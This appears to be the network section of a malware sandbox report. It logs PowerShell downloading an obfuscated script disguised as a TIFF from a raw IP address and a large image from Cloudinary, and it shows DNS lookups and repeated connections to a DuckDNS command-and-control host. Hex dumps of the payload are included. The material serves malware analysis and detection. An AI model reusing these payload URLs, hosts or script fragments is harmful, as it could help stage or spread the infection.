Dec 11, 2024 11:26:47.687238932 CET	14645	50015	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:47.687482119 CET	50015	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:47.715496063 CET	50015	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:47.834832907 CET	14645	50015	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:57.998961926 CET	14645	50015	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:57.999069929 CET	50015	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:57.999144077 CET	50015	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:58.118623972 CET	14645	50015	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:59.330111027 CET	50016	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:59.449806929 CET	14645	50016	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:59.449878931 CET	50016	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:59.454045057 CET	50016	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:59.573400021 CET	14645	50016	192.169.69.26	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 11:23:07.657213926 CET	49987	53	192.168.2.6	1.1.1.1
Dec 11, 2024 11:23:07.954875946 CET	53	49987	1.1.1.1	192.168.2.6
Dec 11, 2024 11:23:27.635417938 CET	50943	53	192.168.2.6	1.1.1.1
Dec 11, 2024 11:23:28.117750883 CET	53	50943	1.1.1.1	192.168.2.6
Dec 11, 2024 11:23:31.225924969 CET	52717	53	192.168.2.6	1.1.1.1
Dec 11, 2024 11:23:31.560018063 CET	53	52717	1.1.1.1	192.168.2.6
Dec 11, 2024 11:24:40.410929918 CET	49386	53	192.168.2.6	1.1.1.1
Dec 11, 2024 11:24:40.712699890 CET	53	49386	1.1.1.1	192.168.2.6
Dec 11, 2024 11:25:49.661032915 CET	60143	53	192.168.2.6	1.1.1.1
Dec 11, 2024 11:25:49.978899002 CET	53	60143	1.1.1.1	192.168.2.6
Dec 11, 2024 11:26:59.004406929 CET	54492	53	192.168.2.6	1.1.1.1
Dec 11, 2024 11:26:59.325905085 CET	53	54492	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 11, 2024 11:23:07.657213926 CET	192.168.2.6	1.1.1.1	0xb60	Standard query (0)	res.cloudinary.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:23:27.635417938 CET	192.168.2.6	1.1.1.1	0x8388	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:23:31.225924969 CET	192.168.2.6	1.1.1.1	0x5669	Standard query (0)	rmcnewprojectadd.duckdns.org	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:24:40.410929918 CET	192.168.2.6	1.1.1.1	0x5504	Standard query (0)	rmcnewprojectadd.duckdns.org	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:25:49.661032915 CET	192.168.2.6	1.1.1.1	0xb59b	Standard query (0)	rmcnewprojectadd.duckdns.org	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:26:59.004406929 CET	192.168.2.6	1.1.1.1	0xacda	Standard query (0)	rmcnewprojectadd.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 11, 2024 11:23:07.954875946 CET	1.1.1.1	192.168.2.6	0xb60	No error (0)	res.cloudinary.com	cloudinary.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 11, 2024 11:23:07.954875946 CET	1.1.1.1	192.168.2.6	0xb60	No error (0)	cloudinary.map.fastly.net		151.101.1.137	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:23:07.954875946 CET	1.1.1.1	192.168.2.6	0xb60	No error (0)	cloudinary.map.fastly.net		151.101.65.137	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:23:07.954875946 CET	1.1.1.1	192.168.2.6	0xb60	No error (0)	cloudinary.map.fastly.net		151.101.129.137	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:23:07.954875946 CET	1.1.1.1	192.168.2.6	0xb60	No error (0)	cloudinary.map.fastly.net		151.101.193.137	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:23:28.117750883 CET	1.1.1.1	192.168.2.6	0x8388	No error (0)	paste.ee		104.21.84.67	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:23:28.117750883 CET	1.1.1.1	192.168.2.6	0x8388	No error (0)	paste.ee		172.67.187.200	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:23:31.560018063 CET	1.1.1.1	192.168.2.6	0x5669	No error (0)	rmcnewprojectadd.duckdns.org		192.169.69.26	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:24:40.712699890 CET	1.1.1.1	192.168.2.6	0x5504	No error (0)	rmcnewprojectadd.duckdns.org		192.169.69.26	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:25:49.978899002 CET	1.1.1.1	192.168.2.6	0xb59b	No error (0)	rmcnewprojectadd.duckdns.org		192.169.69.26	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:26:59.325905085 CET	1.1.1.1	192.168.2.6	0xacda	No error (0)	rmcnewprojectadd.duckdns.org		192.169.69.26	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

res.cloudinary.com

paste.ee

172.245.142.60

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49707	172.245.142.60	80	4824	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:23:01.459352016 CET	343	OUT	GET /551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 172.245.142.60 Connection: Keep-Alive
Dec 11, 2024 11:23:02.599783897 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:23:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Mon, 09 Dec 2024 08:27:27 GMT ETag: "25960-628d22283020e" Accept-Ranges: bytes Content-Length: 153952 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 50 00 74 00 75 00 4f 00 71 00 6f 00 66 00 65 00 63 00 64 00 47 00 6b 00 48 00 4c 00 74 00 20 00 3d 00 20 00 22 00 63 00 49 00 6b 00 52 00 4e 00 72 00 57 00 57 00 7a 00 6e 00 64 00 75 00 78 00 70 00 42 00 22 00 0d 00 0a 00 6e 00 47 00 54 00 7a 00 4c 00 70 00 4b 00 69 00 63 00 71 00 70 00 74 00 69 00 61 00 6b 00 20 00 3d 00 20 00 22 00 47 00 55 00 4b 00 65 00 57 00 4c 00 70 00 75 00 65 00 6a 00 63 00 71 00 6c 00 65 00 4b 00 22 00 0d 00 0a 00 65 00 4c 00 65 00 6a 00 4c 00 41 00 57 00 55 00 6b 00 47 00 42 00 47 00 57 00 62 00 4c 00 20 00 3d 00 20 00 22 00 57 00 63 00 54 00 57 00 4c 00 6c 00 62 00 69 00 4b 00 57 00 69 00 6d 00 4a 00 6d 00 4f 00 22 00 0d 00 0a 00 0d 00 0a 00 4b 00 4e 00 6b 00 55 00 6e 00 7a 00 57 00 6f 00 75 00 68 00 51 00 4b 00 43 00 6f 00 57 00 20 00 3d 00 20 00 22 00 4f 00 7a 00 6f 00 47 00 41 00 6b 00 70 00 61 00 52 00 67 00 68 00 50 00 69 00 64 00 6c 00 22 00 0d 00 0a 00 6c 00 6b 00 52 00 68 00 6d 00 54 00 69 00 75 00 69 00 78 00 [TRUNCATED] Data Ascii: PtuOqofecdGkHLt = "cIkRNrWWznduxpB"nGTzLpKicqptiak = "GUKeWLpuejcqleK"eLejLAWUkGBGWbL = "WcTWLlbiKWimJmO"KNkUnzWouhQKCoW = "OzoGAkpaRghPidl"lkRhmTiuixBLfxb = "PLnGekqaInWfiLa"NctUWsCbBLlmLJH = "tiGWWnmUoLkLKeQ"WiIKlniKljpAkGZ = "GiNkoBUxLcsWbLZ"cWeqBLoozjKtoLQ = "nipZiWjKLzmGWAv"WBoqiQliWCWlhik = "OAGWKmZSLcxUrWd"bALULqGxLWfuzmk = "lbmcWGAOZAmipcK"epLlxrKNKskhAUU = "LcKiKiizJNaoCbS"lkLhaPOnKhujfkh = "LhPCTeLZmnkGuZn"JGiLcC
Dec 11, 2024 11:23:02.599812031 CET	1236	IN	Data Raw: 00 66 00 47 00 4b 00 4e 00 43 00 74 00 74 00 65 00 6b 00 20 00 3d 00 20 00 22 00 57 00 69 00 69 00 57 00 7a 00 57 00 62 00 6b 00 42 00 50 00 62 00 6f 00 47 00 61 00 63 00 22 00 0d 00 0a 00 50 00 6d 00 4c 00 57 00 66 00 53 00 6b 00 53 00 69 00 52 Data Ascii: fGKNCttek = "WiiWzWbkBPboGac"PmLWfSkSiRLmLKn = "BWGiWodLzmipzii"KGfGcjUZehKqnGm = "KZemAWKKnQNcLiP"kUIoeWZBWiczAL
Dec 11, 2024 11:23:02.599828959 CET	448	IN	Data Raw: 00 6f 00 50 00 50 00 4c 00 61 00 4e 00 22 00 0d 00 0a 00 47 00 41 00 4c 00 51 00 63 00 47 00 63 00 63 00 41 00 62 00 4c 00 4c 00 4c 00 63 00 57 00 20 00 3d 00 20 00 22 00 69 00 62 00 47 00 6d 00 55 00 74 00 6d 00 4c 00 7a 00 4f 00 6b 00 55 00 47 Data Ascii: oPPLaN"GALQcGccAbLLLcW = "ibGmUtmLzOkUGqm"mIARWGULAqBAKiN = "GbCjoNZnRkmWIeL"GRhiIiuqkAiHcZh = "cjlichoNLLdiazg"n
Dec 11, 2024 11:23:02.599963903 CET	1236	IN	Data Raw: 00 69 00 4f 00 57 00 63 00 55 00 4c 00 22 00 0d 00 0a 00 57 00 4e 00 68 00 75 00 57 00 4f 00 61 00 62 00 54 00 50 00 6f 00 70 00 4f 00 67 00 4b 00 20 00 3d 00 20 00 22 00 4c 00 61 00 4c 00 63 00 6d 00 4c 00 4b 00 63 00 70 00 64 00 6e 00 6d 00 4b Data Ascii: iOWcUL"WNhuWOabTPopOgK = "LaLcmLKcpdnmKRh"nbGRHLqRfzsHskK = "ieKsdiLATGiIKcA"GRmKIAzziiacczU = "LuizPcLGNpWmLtn"S
Dec 11, 2024 11:23:02.599980116 CET	1236	IN	Data Raw: 00 20 00 3d 00 20 00 22 00 6d 00 4c 00 65 00 67 00 69 00 69 00 75 00 53 00 41 00 57 00 6d 00 70 00 57 00 4b 00 4b 00 22 00 0d 00 0a 00 4e 00 4c 00 5a 00 4c 00 69 00 4f 00 57 00 4c 00 66 00 55 00 4c 00 50 00 78 00 5a 00 41 00 20 00 3d 00 20 00 22 Data Ascii: = "mLegiiuSAWmpWKK"NLZLiOWLfULPxZA = "bBqldNcoGGbZzpm"oOZfLWiWRtRKmvN = "bGvcLANWWLkLkLW"LOdLjmCGKkofPah = "PzrZ
Dec 11, 2024 11:23:02.599987030 CET	1236	IN	Data Raw: 00 6b 00 4c 00 69 00 64 00 6c 00 57 00 5a 00 70 00 6d 00 7a 00 55 00 6e 00 5a 00 63 00 4b 00 20 00 3d 00 20 00 22 00 70 00 69 00 62 00 6c 00 47 00 78 00 4c 00 57 00 62 00 5a 00 4f 00 50 00 65 00 55 00 4f 00 22 00 0d 00 0a 00 41 00 72 00 68 00 4c Data Ascii: kLidlWZpmzUnZcK = "piblGxLWbZOPeUO"ArhLiCKLGiQlLHU = "maqiIGTkzppWLfk"WpUPGGUWtLdnNLz = "mzOAIWtWNBNRmkm"TLJCJCelLU
Dec 11, 2024 11:23:02.599998951 CET	672	IN	Data Raw: 00 7a 00 64 00 4c 00 53 00 50 00 66 00 4f 00 66 00 51 00 47 00 67 00 47 00 22 00 0d 00 0a 00 6e 00 70 00 69 00 57 00 47 00 69 00 5a 00 64 00 69 00 4b 00 41 00 76 00 57 00 4e 00 5a 00 20 00 3d 00 20 00 22 00 75 00 4c 00 62 00 70 00 5a 00 4b 00 55 Data Ascii: zdLSPfOfQGgG"npiWGiZdiKAvWNZ = "uLbpZKUjmOckgCW"iObLGbKnzqLWGbk = "aiWqLNkUkZAUNLh"WKgcmUhzNhziicm = "LNhNLKLNfGBZv
Dec 11, 2024 11:23:02.600203991 CET	1236	IN	Data Raw: 00 4c 00 4c 00 63 00 68 00 6b 00 6c 00 7a 00 55 00 48 00 22 00 0d 00 0a 00 0d 00 0a 00 4f 00 6d 00 69 00 65 00 4c 00 6b 00 47 00 6b 00 5a 00 6a 00 5a 00 6b 00 54 00 6d 00 7a 00 20 00 3d 00 20 00 22 00 48 00 62 00 6c 00 62 00 4b 00 76 00 72 00 6e Data Ascii: LLchklzUH"OmieLkGkZjZkTmz = "HblbKvrnaigHzcf"WAiWPhAOzCKckiL = "ZPxfUbBufiZxbbz"TiKGtjWelGWcRPK = "pieeWPtSWUtztK
Dec 11, 2024 11:23:02.600298882 CET	1236	IN	Data Raw: 00 69 00 57 00 63 00 47 00 4b 00 20 00 3d 00 20 00 22 00 4f 00 6b 00 54 00 62 00 57 00 57 00 4f 00 76 00 57 00 57 00 57 00 4c 00 4c 00 42 00 78 00 22 00 0d 00 0a 00 47 00 42 00 4c 00 6c 00 50 00 4c 00 4f 00 4b 00 41 00 61 00 4e 00 4c 00 6b 00 55 Data Ascii: iWcGK = "OkTbWWOvWWWLLBx"GBLlPLOKAaNLkUJ = "zUeLnUIZKrCKLNW"RiioGWzIxmOdBJk = "iKLPnUULhzUbaLa"claLccLRRSgzmZN = "j
Dec 11, 2024 11:23:02.600315094 CET	448	IN	Data Raw: 00 69 00 6e 00 22 00 0d 00 0a 00 68 00 47 00 57 00 52 00 76 00 5a 00 74 00 69 00 57 00 4b 00 4e 00 62 00 6d 00 68 00 63 00 20 00 3d 00 20 00 22 00 6b 00 52 00 4a 00 76 00 57 00 47 00 62 00 4c 00 6e 00 47 00 63 00 43 00 70 00 47 00 62 00 22 00 0d Data Ascii: in"hGWRvZtiWKNbmhc = "kRJvWGbLnGcCpGb"adNAiomdWWhJcAs = "KIGUWfRToKiKLfW"zhLuebWflWlGKWB = "LPNnxWiibauLSWW"laqfi
Dec 11, 2024 11:23:02.719865084 CET	1236	IN	Data Raw: 00 22 00 0d 00 0a 00 63 00 47 00 63 00 4c 00 65 00 6a 00 6e 00 41 00 69 00 6f 00 61 00 72 00 4e 00 6e 00 47 00 20 00 3d 00 20 00 22 00 61 00 69 00 4b 00 6f 00 57 00 63 00 4c 00 4c 00 50 00 63 00 4f 00 55 00 4f 00 4c 00 4b 00 22 00 0d 00 0a 00 0d Data Ascii: "cGcLejnAioarNnG = "aiKoWcLLPcOUOLK"AtxKqbaZOLKKKhW = "kAexzcNLBpIPuWI"mkZlWoAWWxIpiGd = "TUeKKCbcZbjkzzN"kpeil

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	151.101.1.137	443	2704	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 10:23:09 UTC	127	OUT	GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1 Host: res.cloudinary.com Connection: Keep-Alive
2024-12-11 10:23:09 UTC	750	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2230233 Content-Type: image/jpeg Etag: "7b9a6708dc7c92995f443d0b41dbc8d0" Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT Date: Wed, 11 Dec 2024 10:23:09 GMT Strict-Transport-Security: max-age=604800 Cache-Control: public, no-transform, immutable, max-age=2592000 Server-Timing: cld-fastly;dur=2;cpu=1;start=2024-12-11T10:23:09.459Z;desc=hit,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)" Server: Cloudinary Timing-Allow-Origin: * Access-Control-Allow-Origin: * Accept-Ranges: bytes X-Content-Type-Options: nosniff Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options x-request-id: 6f487a4c60d72621f2efeecff85ca20a
2024-12-11 10:23:09 UTC	1378	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-12-11 10:23:09 UTC	1378	IN	Data Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1\|\;,#o
2024-12-11 10:23:09 UTC	1378	IN	Data Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b Data Ascii: "t-&/{mO\| mv%sb_4{fIj[hutzq\|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
2024-12-11 10:23:09 UTC	1378	IN	Data Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9 Data Ascii: fmKfa&#ps5]&wde&\|W,o!p{bl n13D9\|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
2024-12-11 10:23:09 UTC	1378	IN	Data Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7 Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG\|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
2024-12-11 10:23:09 UTC	1378	IN	Data Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
2024-12-11 10:23:09 UTC	1378	IN	Data Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07 Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
2024-12-11 10:23:09 UTC	1378	IN	Data Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 Data Ascii: Iv14jpIF.UbX$Yi\|QUB81k}w1"eP}0cQ!KAN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
2024-12-11 10:23:09 UTC	1378	IN	Data Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a Data Ascii: 